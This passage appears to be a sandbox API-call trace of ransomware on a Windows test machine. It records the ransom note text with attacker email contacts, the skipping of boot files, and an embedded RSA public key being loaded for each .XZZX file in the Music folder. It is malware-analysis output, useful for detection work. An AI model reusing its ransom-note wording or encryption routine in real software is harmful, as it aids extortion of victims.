lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0185.334] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0185.334] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xbec) returned 0x0 [0185.334] RegQueryValueExW (in: hKey=0xbec, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43aea88, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43aea88*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0185.334] RegCloseKey (hKey=0xbec) returned 0x0 [0185.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0185.334] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0185.334] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbec [0185.335] CloseHandle (hObject=0xbec) returned 1 [0185.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0185.335] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0185.335] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0185.335] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0185.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0185.335] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2="..") returned 1 [0185.335] lstrcmpW (lpString1="auOsV3M 9VtNbJuKze", lpString2=".") returned 1 [0185.335] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0185.335] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.335] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0185.335] SetErrorMode (uMode=0x1) returned 0x1 [0185.335] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0185.335] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.335] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.335] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0185.335] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0185.336] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0185.336] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0185.336] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.336] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.336] lstrcmpW (lpString1="1037641408F8F044B7533AA10D10D48C.XZZX", lpString2="..") returned 1 [0185.336] lstrcmpW (lpString1="1037641408F8F044B7533AA10D10D48C.XZZX", lpString2=".") returned 1 [0185.336] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.336] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntldr") returned 0x0 [0185.336] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTLDR") returned 0x0 [0185.336] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.336] StrStrW (lpFirst="1037641408F8F044B7533AA10D10D48C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.336] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0185.336] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0185.336] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.336] lstrcpyW (in: lpString1=0x17be7c, lpString2="1037641408F8F044B7533AA10D10D48C.XZZX" | out: lpString1="1037641408F8F044B7533AA10D10D48C.XZZX") returned="1037641408F8F044B7533AA10D10D48C.XZZX" [0185.336] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbf4 [0185.337] Sleep (dwMilliseconds=0x96) [0185.489] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.489] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2="..") returned 1 [0185.489] lstrcmpW (lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX", lpString2=".") returned 1 [0185.489] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.489] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntldr") returned 0x0 [0185.489] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTLDR") returned 0x0 [0185.490] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.490] StrStrW (lpFirst="23947E243409DC7CAF2C62063821C0C4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.490] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0185.490] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0185.490] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.490] lstrcpyW (in: lpString1=0x17be7c, lpString2="23947E243409DC7CAF2C62063821C0C4.XZZX" | out: lpString1="23947E243409DC7CAF2C62063821C0C4.XZZX") returned="23947E243409DC7CAF2C62063821C0C4.XZZX" [0185.490] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbf8 [0185.490] Sleep (dwMilliseconds=0x96) [0185.645] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.645] lstrcmpW (lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpString2="..") returned 1 [0185.645] lstrcmpW (lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpString2=".") returned 1 [0185.645] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.645] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="ntldr") returned 0x0 [0185.646] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="NTLDR") returned 0x0 [0185.646] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.646] StrStrW (lpFirst="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.646] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0185.646] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0185.646] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.646] lstrcpyW (in: lpString1=0x17be7c, lpString2="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" | out: lpString1="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX") returned="2ADDD7CE37DE6C473ADF3B8E3BFF508F.XZZX" [0185.646] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbfc [0185.647] Sleep (dwMilliseconds=0x96) [0185.801] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.801] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2="..") returned 1 [0185.801] lstrcmpW (lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX", lpString2=".") returned 1 [0185.801] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.801] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntldr") returned 0x0 [0185.801] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTLDR") returned 0x0 [0185.801] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.802] StrStrW (lpFirst="51A5A3C031894064FCB3CED0366624AC.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.802] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0185.802] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0185.802] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.802] lstrcpyW (in: lpString1=0x17be7c, lpString2="51A5A3C031894064FCB3CED0366624AC.XZZX" | out: lpString1="51A5A3C031894064FCB3CED0366624AC.XZZX") returned="51A5A3C031894064FCB3CED0366624AC.XZZX" [0185.802] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc04 [0185.802] Sleep (dwMilliseconds=0x96) [0185.957] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0185.957] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2="..") returned 1 [0185.957] lstrcmpW (lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpString2=".") returned 1 [0185.957] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0185.958] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntldr") returned 0x0 [0185.958] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTLDR") returned 0x0 [0185.958] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0185.958] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0185.958] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0185.958] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0185.958] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0185.958] lstrcpyW (in: lpString1=0x17be7c, lpString2="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" | out: lpString1="54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned="54E892FC383D1FA0EE2D03953C6A03E8.XZZX" [0185.958] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0185.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc08 [0185.958] Sleep (dwMilliseconds=0x96) [0186.113] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.113] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2="..") returned 1 [0186.113] lstrcmpW (lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpString2=".") returned 1 [0186.113] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.113] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntldr") returned 0x0 [0186.113] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTLDR") returned 0x0 [0186.114] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.114] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.114] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.114] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.114] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 